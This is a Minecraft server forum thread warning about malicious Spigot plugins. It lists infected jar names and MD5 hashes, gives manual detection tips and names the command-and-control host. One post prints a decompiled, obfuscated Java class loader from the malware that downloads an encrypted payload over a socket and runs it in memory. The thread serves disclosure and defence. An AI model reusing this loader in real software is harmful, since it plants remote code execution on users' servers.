List of Found Malware

Discussion in 'Spigot Plugin Help' started by Optic_Fusion1, Aug 10, 2019.

  1. Edit: My AntiMalware detects this malware & over 200 other malicious plugins

    Recently there have been a variety of malicious uploads of the same malware.
    This malware adds code to the server jar with the class path of org/bukkit/util/io/Jtoc.class or similar.
    Normally i wouldn't make these types of threads, however since this affects the server jar and staff are slow to respond to reports i figured making this was a good idea.
    To find this malware manually you'll want to use a decompiler (I find JByteMod works perfectly for this one) and look for the class with the "findClass" method, if it has that, it's probably malicious.
    The following jar names to check are:
    Timber.jar
    TakeAim.jar
    StorageShelfs.jar
    Shout! chat.jar
    reporter-v2.jar
    Plugs.jar
    PingTest.jar
    NOPE!.jar
    JoinMessageBlocker.jar
    HandRefiller.jar
    Fly.jar
    Feed.jar
    FairEXP.jar
    EntityBlood.jar
    EasyShops2.0.jar
    EasyDeaths.jar
    DeadChest.jar
    CustomCraft.jar
    ConsoleControl.jar
    ChainArmor.jar
    BetterBookshelfs.jar
    AutoItemReload-v1.6.jar
    AutoItemReload.jar
    AnimatedMOTD.jar
    brewery-1.8.jar
    Reequip.jar
    CampfireRecipes.jar
    PingTest.jar
    SaveMyItems.jar

    MD5 checksum list:
    377A55AEFEF3286DAA76740C4642A6F8
    B2AEE2B12B5B1DC102919B83ED0130C6
    D6D954EC15D968F173E791CB00BD4B21
    67D5D6D48D5C26A93B50DDB3DA8C2266
    E438E0A6722A6F1BF676EA65C0A46504
    BB94B7D0EC1FEF12AE9253001C536B18
    4B91352DEEE8B21796F56F1406B922A7
    F06B2DA5595D77788DE1E6F2CBF17ECC
    B945E59225BC4EC7AD73906A40551F63
    547E251605864CAEC9DA869979CA2864
    95882B382EFB59A64222E9BF4AB1F867
    F780874BFC1578BBA65F2317BDAC6495
    A9B1254640E8C4D625F271D9E2785C72
    0840DF88876ABBD494B80E46CEF78980
    6E817BC665D498CFA0C90D9F968E57CD
    44ACE6D0080B499FBE6529A1965083E4
    69C7B35F5F1B11737BD8FD720F5BDFF5
    501F4E6F0566694C539A870828E14BDC
    405E07197B34A684357A6687F672CE6B
    B5220EFF5FC9F82AE706B2E258F089EC
    597F072C86386FBD094AEF082C3A5694
    BDF7AA93B401D925B07A0CE24A0F04A7
    FD5460783DBA4B098747A1DDDC91BF8B
    444E7EB0B0E8B5C1D87BEF49EB2046C9
    936C01A3B5E4F9FB99540FC69B9B340E
    444E7EB0B0E8B5C1D87BEF49EB2046C9
    936C01A3B5E4F9FB99540FC69B9B340E
    389AB801C513A4E2D33E13EC3D2C3C42
    E1415BA5AD3E7749155F515CEC70D575
    6D2D80306DB945A70799E58486F42AC1
    2333896B3C7A6AFCEC4C5F191830B066
    FEA7AC51BCECB11DAD840DB9799FD1F8
    4C7490E13DC76A451DCD9C07E964F801
    1CFE8A8F96E879C66DD7022E10144326
    6E817BC665D498CFA0C90D9F968E57CD
    D60E210ABE23ECBD3E832421C8DA00E9
    936C01A3B5E4F9FB99540FC69B9B340E
    EA3B168691A61944DD6E0B8EAA7F4BAB
     
    #1 Optic_Fusion1, Aug 10, 2019
    Last edited: Apr 23, 2021
    • Useful Useful x 12
    • Winner Winner x 4
    • Informative Informative x 4
    • Like Like x 3
  2. and if it wasn't obvious by the "it affects the server jar". If you DO have the malware you MUST delete the infected plugin and replace the server jar with a newly built one
     
    #2 Optic_Fusion1, Aug 10, 2019
    Last edited: Sep 26, 2019
  3. Glare

    Glare Previously ItsMeGlare

  4. Yes, however it's heavily out of date & doesn't get updates and detects very little malware outside of ForceOPs.
    So i heavily suggest using my AntiMalware since it gets updates (mainly database updates, however I'm working on a rewrite for V5). The rewrite will also fix an issue with it NOT properly detecting this sort of malware (plus it will detect 110 other malicious plugins total after the rewrite and will grow as more malware gets published to spigot)
     
  5. Glare

    Glare Previously ItsMeGlare

    Looking forward to it!
     
  6. I'll also use this as an opportunity to say this.
    If you find a malicious plugin dm it to me.
    I'll be able to update my AntiMalware if you do.
     
  7. These listed jars were all spigotmc hosted plugins?
     
  8. Indeed, i reported most of them my self.
    They usually stayed up for a few hours to a day+ though, even after reporting them
     
  9. These were all plugins uploaded by different people?

    What does the malware do?
     
  10. They were most likely alts
    as for what it does, it Downloads and executes a malicious jar from a 3rd party website.
    It also modifies the server.jar to add malicious code, which was brought up in the OP
     
  11. as for the malicious code its self, it's always a variation of the following
    Code (Text):

    /*
    * Illegal identifiers - consider using --renameillegalidents true
    */
    public final class \u2001
    extends ClassLoader {
        private /* synthetic */ Map<String, Class<?>> \u2002;
        private /* synthetic */ Map<String, byte[]> \u2003;
        public static final /* synthetic */ boolean \u2004;

        /*
         * Unable to fully structure code
         */
        public final void \u2004() {
            try {
                var1_1 = Cipher.getInstance((String)\u2000.\u2003((String)"\u9557\u9553\u9545", (int)-1026517738));
                v0 = new byte[-295882746 ^ -295882730];
                v0[-931940953 ^ -931940953] = -1098860341 ^ -1098860325;
                v0[-638773133 ^ -638773134] = -907155858 ^ -907155961;
                v0[-445928176 ^ -445928174] = -1683403140 ^ 1683403205;
                v0[-1507965502 ^ -1507965503] = -2114810239 ^ -2114810117;
                v0[1416267215 ^ 1416267211] = 485231374 ^ -485231368;
                v0[-1156570466 ^ -1156570469] = -223645556 ^ -223645547;
                v0[-1613121302 ^ -1613121300] = -1823356931 ^ -1823356969;
                v0[-1660085159 ^ -1660085154] = 1736611736 ^ 1736611819;
                v0[521103091 ^ 521103099] = -1721889310 ^ -1721889384;
                v0[-1101408481 ^ -1101408490] = 1538028923 ^ -1538028910;
                v0[199548933 ^ 199548943] = -267659524 ^ -267659545;
                v0[464781751 ^ 464781756] = 1305198386 ^ -1305198462;
                v0[2117382728 ^ 2117382724] = 2248946 ^ -2248936;
                v0[-793067839 ^ -793067828] = 442328199 ^ -442328243;
                v0[1817172676 ^ 1817172682] = -87177455 ^ -87177352;
                v0[1748328588 ^ 1748328579] = -1641080670 ^ -1641080698;
                var1_1.init(406466958 ^ 406466956, (Key)new SecretKeySpec(v0, 1033142390 ^ 1033142390, 1985306537 ^ 1985306553, \u2000.\u2003((String)"\u5752\u5756\u5740", (int)-238790893)));
                var2_3 = null;
                try {
                    block28 : {
                        var3_4 = new ZipInputStream((InputStream)new CipherInputStream(new Socket(new String(Base64.getDecoder().decode(\u2000.\u2003((String)"\u437d\u4341\u435b\u4372\u4340\u4341\u434b\u4375\u4357\u435e\u4361\u4369\u4343\u4374\u434c\u436c\u437c\u4351\u4375\u432f", (int)217269017))), 357831313 ^ 357830667).getInputStream(), var1_1));
                        var4_6 = null;
                        try {
                            while ((var5_7 = var3_4.getNextEntry()) != null) {
                                if (var5_7.isDirectory()) {
                                    if (!\u2001.\u2004) continue;
                                    throw null;
                                }
                                var6_10 = new ByteArrayOutputStream();
                                var7_11 = new byte[-1504340926 ^ -1504341950];
                                while ((var8_12 = var3_4.read(var7_11)) > 0) {
                                    var6_10.write(var7_11, 762669250 ^ 762669250, var8_12);
                                    if (!\u2001.\u2004) continue;
                                    throw null;
                                }
                                var9_13 = var5_7.getName();
                                var10_14 = var6_10.toByteArray();
                                if (var9_13.endsWith(\u2000.\u2003((String)"\uda3f\uda72\uda7d\uda70\uda62\uda62", (int)-2089100783))) {
                                    this.\u2003.put((Object)var9_13.substring(228966171 ^ 228966171, var9_13.lastIndexOf(-1479016577 ^ -1479016623)).replace((char)(1102107222 ^ 1102107257), (char)(-1789535088 ^ -1789535042)), (Object)var10_14);
                                    if (\u2001.\u2004) {
                                        throw null;
                                    }
                                } else if (var9_13.equals((Object)\u2000.\u2003((String)"\u1114\u111c\u110d\u1118\u1174\u1110\u1117\u111f\u1176\u1114\u1118\u1117\u1110\u111f\u111c\u110a\u110d\u1177\u1114\u111f", (int)840962393))) {
                                    var11_15 = new String(var10_14);
                                    var12_16 = var11_15.split(\u2000.\u2003((String)"\uadd6", (int)1362210268));
                                    var13_17 = var12_16.length;
                                    for (var14_18 = -655463381 ^ -655463381; var14_18 < var13_17; ++var14_18) {
                                        var15_19 = var12_16[var14_18];
                                        if (!var15_19.startsWith(\u2000.\u2003((String)"\u8484\u84a8\u84a0\u84a7\u84e4\u848a\u84a5\u84a8\u84ba\u84ba\u84f3\u84e9", (int)-97942327))) {
                                            if (!\u2001.\u2004) continue;
                                            throw null;
                                        }
                                        var2_3 = var15_19.replace((CharSequence)\u2000.\u2003((String)"\u8253\u827f\u8277\u8270\u8233\u825d\u8272\u827f\u826d\u826d\u8224\u823e", (int)-1263500770), (CharSequence)\u2000.\u2003((String)"", (int)1176517957)).replace((CharSequence)\u2000.\u2003((String)"\ucf18", (int)1425461013), (CharSequence)\u2000.\u2003((String)"", (int)1173404379)).replace((CharSequence)\u2000.\u2003((String)"\ud5c3", (int)-2107648567), (CharSequence)\u2000.\u2003((String)"", (int)1935636255));
                                        if (!\u2001.\u2004) break;
                                        throw null;
                                    }
                                }
                                if (!\u2001.\u2004) continue;
                                throw null;
                            }
                            v1 = new Class[-792448108 ^ -792448107];
                            v1[-1068148723 ^ -1068148723] = String[].class;
                            v2 = new Object[1444527654 ^ 1444527655];
                            v2[-145382113 ^ -145382113] = new String[-978086432 ^ -978086432];
                            this.findClass(var2_3).getMethod(\u2000.\u2003((String)"\ud90d\ud901\ud909\ud90e", (int)-234235552), v1).invoke((Object)null, v2);
                            ** if (!\u2001.\u2004) goto lbl-1000
                        }
                        catch (Throwable var5_9) {
                            var4_6 = var5_9;
                            throw var5_9;
                        }
                        finally {
                            if (var3_4 == null) break block28;
                            if (var4_6 != null) {
                                try {
                                    var3_4.close();
                                    ** if (!\u2001.\u2004) goto lbl-1000
                                }
                                catch (Throwable var5_8) {
                                    var4_6.addSuppressed(var5_8);
                                    if (\u2001.\u2004) {
                                        throw null;
                                    }
                                    break block28;
                                }
    lbl-1000: // 1 sources:
                                {
                                    throw null;
                                }
    lbl-1000: // 1 sources:
                                {
                                    break block28;
                                }
                            }
                            var3_4.close();
                        }
    lbl-1000: // 1 sources:
                        {
                            throw null;
                        }
    lbl-1000: // 1 sources:
                        {
                        }
                    }
                    ** if (!\u2001.\u2004) goto lbl-1000
                }
                catch (Throwable var3_5) {
                    Thread.sleep((long)(4083438937477440096L ^ 4083438937477420880L));
                    this.\u2004();
                }
    lbl-1000: // 1 sources:
                {
                    throw null;
                }
    lbl-1000: // 1 sources:
                {
                }
                ** if (!\u2001.\u2004) goto lbl-1000
            }
            catch (Throwable var1_2) {
                // empty catch block
            }
    lbl-1000: // 1 sources:
            {
                throw null;
            }
    lbl-1000: // 1 sources:
            {
            }
        }

        public final void \u2005() {
            new Thread(this::\u2004).start();
        }

        private void \u2006(String string, byte[] arrby) {
            this.\u2002.put((Object)string, (Object)this.defineClass(string, arrby, 770185465 ^ 770185465, arrby.length));
        }

        public \u2001() {
            this.\u2003 = new HashMap();
            this.\u2002 = new HashMap();
        }

        protected Class<?> findClass(String string) throws ClassNotFoundException {
            if (!this.\u2002.containsKey((Object)string)) {
                if (!this.\u2003.containsKey((Object)string)) {
                    throw new ClassNotFoundException(string);
                }
                this.\u2006(string, (byte[])this.\u2003.get((Object)string));
            }
            return (Class)this.\u2002.get((Object)string);
        }
    }
     
     
  12. Maybe notify the abuse contact of the web host?
     
    • Useful Useful x 1
  13. Yea, probably should huh.
    I'll have to re-get the website URL.
    Though i usually suck at this sorta stuff ;-;

    edit:
    website is update4life.xyz . You have to connect with port 666 however otherwise it re-directs you to a youtube video
     
    #14 Optic_Fusion1, Aug 11, 2019
    Last edited: Aug 11, 2019
  14. :911 have fun.
     
  15. Still port 666, for the malware anyways
    upload_2019-8-11_17-54-30.png
     
  16. I wonder what it effectively does, bitcoin machine?
     
  17. Wouldn't be surprised if that's the case honestly, i haven't really spent time trying to look at the payload my self though
     
  18. What AnimatedMOTD plugin was it? I may have downloaded and ran one by accident...